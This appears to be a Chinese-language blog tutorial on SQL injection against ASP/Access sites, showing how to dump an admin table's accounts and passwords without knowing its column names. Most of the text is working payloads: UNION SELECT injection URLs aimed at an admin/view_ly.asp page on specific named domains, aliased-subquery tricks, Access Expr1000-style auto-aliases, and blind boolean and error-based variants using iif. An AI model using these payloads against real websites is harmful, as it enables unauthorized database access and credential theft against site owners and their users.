适用情况同上篇文章,知道表名,不知道字段名。这种方法适用起来更简便。
http://www.am0s.com/admin/view_ly.asp?lyid=5 union select 1,2,3,4,5,6,7 from admin
确定目标存在7个字段,其中2、3、5、6、为显位
http://www.am0s.com/admin/view_ly.asp?lyid=5 union select 1,2,3,4,5,6,7 from(select * from admin order by 8)
通过order by 猜测admin表中字段总数为8,然后构造子查询并指定字段的别名
select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5,6 as field_6,7 as field_7,8 as field_8fromadminwhere 1=2 unionselect * fromadmin
最后对这个子查询结果集进行查询即可(可直接查询别名):
http://lnhqy.com/admin/view_ly.asp?lyid=5 union select 1,field_1,field_2,4,field_3,6,7 from(select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5,6 as field_6,7 as field_7,8 as field_8 from admin where 1=2 union select * from admin)
可直接查询出admin帐号和密码。
当数据库为access时,可不使用别名进行注入,access会自动为没有别名的字段设置别名(分别为Expr1000、Expr1001…..)
http://www.am0s.com/admin/view_ly.asp?lyid=5 union select 1 as x,2 as xx,Expr1001,4 as xxxx,Expr1002,6 as xxxxxx, 7 as xxxxxxx from(select 1,2,3,4,5,6,7,8 from admin where 1=2 union select * from admin )
如果需要添加条件,只需在嵌套一层子查询
union select 1,2,3,field_1&'|'&field_2&'|'&field_3&'|'&field_4&'|'&field_5
from(
select * from (
select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5
from admin
where 1=2
union select * from admin)
where field_1 not in (1)
)
盲注的时候可以这样(用于回显不同时):
select title,time,author,content from article where id=999999999 or
(
select top 1 len(field_1) from(
select 1 as field_1,2,3,4,5 from admin
where 1=2
union select * from admin)
)>0
也可以这样(用于因多次代入无论如何都报错时,或500/200的区别时):
select title,time,author,content from article where id=999999999 or
iif(
(select top 1 len(field_1) from(
select 1 as field_1,2,3,4,5 from admin
where 1=2 union select * from admin)
)>0,
1,
(select 2 from multi_rows_table)
)=1